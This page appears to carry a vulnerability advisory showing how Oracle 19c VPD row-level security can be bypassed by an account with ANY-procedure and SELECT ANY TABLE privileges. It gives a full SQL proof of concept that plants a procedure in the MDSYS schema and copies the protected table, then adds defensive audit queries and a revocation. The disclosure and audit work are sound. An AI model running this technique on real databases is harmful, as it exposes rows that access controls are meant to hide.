Breaking Oracle Database VPD Through DDL Permissions In 19c

09 Sep 2024 00:00:00 · Reported by Emad Al-Mousa · Type: packetstorm · Source: packetstormsecurity.com · 309 views

Breaking Oracle Database VPD in 19c by exploiting DDL permission

Title: Breaking Oracle Database VPD (Virtual Private Database) Through DDL Permissions in 19c
Product: Database
Manufacturer: Oracle
Affected Version(s): 19c
Tested Version(s): 19c
Risk Level: Low
Author of Advisory: Emad Al-Mousa

*****************************************
Vulnerability Details:

By design, the VPD security feature prevents any database account that has not been granted EXEMPT ACCESS POLICY from viewing the complete set of rows in a protected table. The DBA role is a separate case, covered at the end.

However, this feature does not protect against accounts holding DDL permissions, in particular an account granted the following system privileges: CREATE ANY PROCEDURE, EXECUTE ANY PROCEDURE, SELECT ANY TABLE.

For a VPD simulation you can follow the steps in this link: https://geodatamaster.com/2024/09/04/oracle-vpd-virtual-private-database-row-level-security-in-19c-and-23ai/

*****************************************
Proof of Concept (PoC):

```text
-- As SYSDBA: create the test account and grant it the privilege set described above
sqlplus / as sysdba

SQL> alter session set container=PDB1;

SQL> CREATE USER owoods IDENTIFIED BY owoods
     DEFAULT TABLESPACE users TEMPORARY TABLESPACE temp;

SQL> GRANT connect, resource, create any procedure, execute any procedure, select any table
     TO owoods;

SQL> GRANT READ ON sh1.customers TO owoods;

SQL> exit;

-- As the test account (subject to the VPD policy on sh1.orders_tab)
sqlplus owoods/owoods@PDB1

SQL> grant read on sh1.orders_tab to public;

-- CREATE ANY PROCEDURE lets owoods place a definer's-rights procedure in the
-- MDSYS schema; the CTAS inside it therefore runs with MDSYS's privileges,
-- not with owoods's VPD-restricted view of the table.
SQL> CREATE OR REPLACE PROCEDURE MDSYS.fetch_data AS
       vsql VARCHAR2(4000);
     BEGIN
       vsql := 'create table MDSYS.orders_tab_copy2 as select * from sh1.orders_tab';
       EXECUTE IMMEDIATE vsql;
     END;
     /

SQL> exec MDSYS.fetch_data;

SQL> select * from MDSYS.orders_tab_copy2;

   CUST_NO   ORDER_NO
---------- ----------
      1234       9876
      5678       5432
```

All rows were successfully extracted from the table, including the rows that the owoods account has no access to by default.

Another important thing to consider is the behaviour of the DBA role. The EXEMPT ACCESS POLICY system privilege is not part of the DBA role, but be careful: the DBA role implicitly carries the GRANT ANY PRIVILEGE system privilege, which allows a DBA account to grant EXEMPT ACCESS POLICY to itself anyway.

*****************************************
References:
https://docs.oracle.com/en/database/oracle/oracle-database/19/dbseg/using-oracle-vpd-to-control-data-access.html#GUID-7FFB40CB-E421-4FE4-8344-29D91360EFAD
https://geodatamaster.com/2024/09/04/oracle-vpd-virtual-private-database-row-level-security-in-19c-and-23ai/
https://databasesecurityninja.wordpress.com/2024/09/07/breaking-oracle-database-vpd-virtual-private-database-through-ddl-permissions-in-19c/
https://databasesecurityninja.wordpress.com/2024/09/04/oracle-database-exempt-access-policy-not-logged-for-sys-account-in-unified-audit-log-ora_secureconfig/
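The advisory shows why VPD alone is not a boundary when an account holds the ANY-privilege combination or a role that can grant EXEMPT ACCESS POLICY. The following audit queries are an added example written for this page, not part of the advisory, and are meant to be run by a DBA inside the PDB that holds the protected tables. They rely only on standard Oracle data-dictionary views (DBA_SYS_PRIVS, DBA_ROLE_PRIVS, DBA_USERS with its ORACLE_MAINTAINED column, and DBA_POLICIES); the schema name SH1 and the account owoods are taken from the PoC and should be replaced with your own.

```sql
-- Added audit queries (not from the advisory). Run as a DBA in the PDB
-- hosting the VPD-protected tables.

-- 1. Accounts and roles that bypass VPD outright via EXEMPT ACCESS POLICY.
SELECT grantee, privilege, admin_option
FROM   dba_sys_privs
WHERE  privilege = 'EXEMPT ACCESS POLICY'
ORDER  BY grantee;

-- 2. Non-Oracle-maintained accounts that directly hold all three privileges
--    abused in the PoC. Role-inherited grants are covered by query 3.
SELECT p.grantee,
       LISTAGG(p.privilege, ', ') WITHIN GROUP (ORDER BY p.privilege) AS privs
FROM   dba_sys_privs p
JOIN   dba_users u ON u.username = p.grantee
WHERE  p.privilege IN ('CREATE ANY PROCEDURE', 'EXECUTE ANY PROCEDURE', 'SELECT ANY TABLE')
AND    u.oracle_maintained = 'N'
GROUP  BY p.grantee
HAVING COUNT(DISTINCT p.privilege) = 3;

-- 3. Accounts whose directly granted roles carry GRANT ANY PRIVILEGE (the DBA
--    role does) or EXEMPT ACCESS POLICY, and so can reach the exemption
--    indirectly. Only one level of role nesting is resolved here.
SELECT rp.grantee, rp.granted_role, sp.privilege
FROM   dba_role_privs rp
JOIN   dba_sys_privs  sp ON sp.grantee = rp.granted_role
WHERE  sp.privilege IN ('GRANT ANY PRIVILEGE', 'EXEMPT ACCESS POLICY')
ORDER  BY rp.grantee, rp.granted_role;

-- 4. Objects actually under VPD in the schema of interest, so the findings
--    above can be scoped to tables that matter.
SELECT object_owner, object_name, policy_name, pf_owner, function, enable
FROM   dba_policies
WHERE  object_owner = 'SH1'   -- schema from the PoC; adjust to your own
ORDER  BY object_name, policy_name;

-- 5. Remediation for the PoC account: remove the ANY privileges and keep
--    only object-level grants, which VPD continues to filter.
REVOKE CREATE ANY PROCEDURE, EXECUTE ANY PROCEDURE, SELECT ANY TABLE FROM owoods;
```

Query 2 deliberately excludes Oracle-maintained schemas such as MDSYS: the concern is human or application accounts that have accumulated ANY privileges, not the internal schemas that are supposed to hold them. A hit in query 3 is worth treating with the same weight as a hit in query 1, since the advisory's closing note is exactly that GRANT ANY PRIVILEGE makes the missing EXEMPT ACCESS POLICY grant a one-statement formality.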

Vulners AI Score: 7.4 (High risk), current as of 09 Sep 2024 00:00.